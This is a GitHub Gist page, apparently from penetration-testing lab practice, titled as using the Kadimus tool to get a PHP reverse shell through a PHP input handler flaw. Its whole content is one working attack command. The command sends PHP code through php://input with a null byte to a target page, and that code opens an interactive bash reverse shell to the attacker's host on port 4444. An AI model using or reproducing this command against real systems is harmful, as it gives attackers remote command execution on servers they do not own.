Created
December 29, 2016 17:30
-
-
Save leveled/313b739443bb024b28185525abc3d0fd to your computer and use it in GitHub Desktop.
Using Kadimus to gain a PHP reverse shell through a PHP handler vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
./kadimus -t https://10.11.1.35/section.php?page=php://input%00 -C \ '<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.104/4444 0>&1 2>&1"); ?>' -X input |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment